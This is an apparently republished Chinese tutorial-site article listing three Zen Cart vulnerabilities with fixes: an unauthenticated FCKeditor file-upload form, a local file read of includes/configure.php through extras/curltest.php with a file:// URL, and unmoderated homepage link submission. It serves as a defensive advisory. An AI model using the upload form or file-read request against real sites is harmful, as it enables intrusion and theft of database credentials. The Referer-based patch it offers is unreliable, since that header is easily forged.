来源:自学PHP网 时间:2015-04-17 14:11 作者: 阅读:次
[导读] 漏洞一form id=frmUpload enctype=multipart/form-data action=http://www.2cto.com /editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=postUpload a new file......
漏洞一
<form id="frmUpload" enctype="multipart/form-data" action="http://www.2cto.com /editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post"> Upload a new file:<br> <input type="file" name="NewFile" size="50"><br> <input id="btnUpload" type="submit" value="Upload"> </form> 可以直接把文件上传到网站的images文件夹,非常危险 修复方法,删除FCK编辑器用其他的编辑器 或者找到editors/fckeditor/editor/filemanager/upload/php/upload.php 文件 在 require('config.php'); require('util.php'); 的下面添加以下代码----------------------------- //防止外部提交 function outsidepost() { $servername=$_SERVER['SERVER_NAME']; $sub_from=@$_SERVER['HTTP_REFERER']; $sub_len=strlen($servername); $checkfrom=substr($sub_from,7,$sub_len); if($checkfrom!=$servername){ echo("you don't outsidepost!"); exit; } } outsidepost(); 漏洞二 本地文件泄露可以直接获得配置文件includes/configure.php的代码 打开http://www.2cto.com /extras/ipn_test_return.php 报出错误 得到网站物理路径 http://www.2cto.com /extras/curltest.php?url=file:///网站物理路径/includes/configure.php 直接得到了得到配置文件includes/configure.php的代码 修复方法:删除根目录整个extras文件夹 漏洞三 网上用的最多的zencart的模板 在http://www.2cto.com /link.html提交链接直接显示在首页 修复方法: 找到includes/modules/sideboxes/lightinthebox/links_box.php 文件 在代码 WHERE ld.language_id = '" . (int)$_SESSION['languages_id'] . "' 后面添加 and l.links_status = '2' 即可 |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com